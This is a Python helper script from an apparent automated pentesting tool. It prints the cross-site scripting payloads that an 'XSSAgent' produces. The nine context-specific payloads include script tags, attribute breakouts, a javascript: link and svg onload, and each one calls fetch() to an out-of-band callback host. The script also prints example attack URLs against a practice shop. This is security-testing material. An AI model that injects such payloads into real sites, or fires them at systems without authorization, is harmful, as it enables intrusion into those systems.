#!/usr/bin/env python3
"""
Show exactly what payload the XSSAgent would generate
"""
import sys
sys.path.insert(0, '/home/ubuntu/Dev/Projects/BugTraceAI/BugTraceAI-CLI')

# Simulate Interactsh URL
class MockInteractsh:
    def get_payload_url(self, vuln_type, param):
        return f"{vuln_type}{param}.test123.oast.fun"

interactsh = MockInteractsh()
param = "searchTerm"
callback_url = interactsh.get_payload_url("xss", param)

# From the actual code
PAYLOAD_TEMPLATES = {
    "html_text": f'<div style="display:none"><script>fetch("https://{callback_url}/xss")</script></div>',
    "attribute_quoted": f'"><div style="display:none"><script>fetch("https://{callback_url}/xss")</script></div>',
    "attribute_unquoted": f' onfocus=fetch("https://{callback_url}/xss") autofocus x=',
    "javascript_string": f'\';fetch("https://{callback_url}/xss");//',
    "javascript_template": f'${{fetch("https://{callback_url}/xss")}}',
    "href": f'javascript:fetch("https://{callback_url}/xss")',
    "style": f'</style><div><script>fetch("https://{callback_url}/xss")</script></div>',
    "svg": f'<svg/onload=fetch("https://{callback_url}/xss")>',
    "unknown": f'<div><script>fetch("https://{callback_url}/xss")</script></div>'
}

print("=" * 70)
print("EXACT PAYLOADS GENERATED BY XSSAgent v3")
print("=" * 70)
print(f"\nCallback URL: {callback_url}\n")

for context, payload in PAYLOAD_TEMPLATES.items():
    print(f"\n[{context}]")
    print(f"  Payload: {payload}")
    print(f"  URL: https://ginandjuice.shop/catalog?searchTerm={payload[:40]}...")
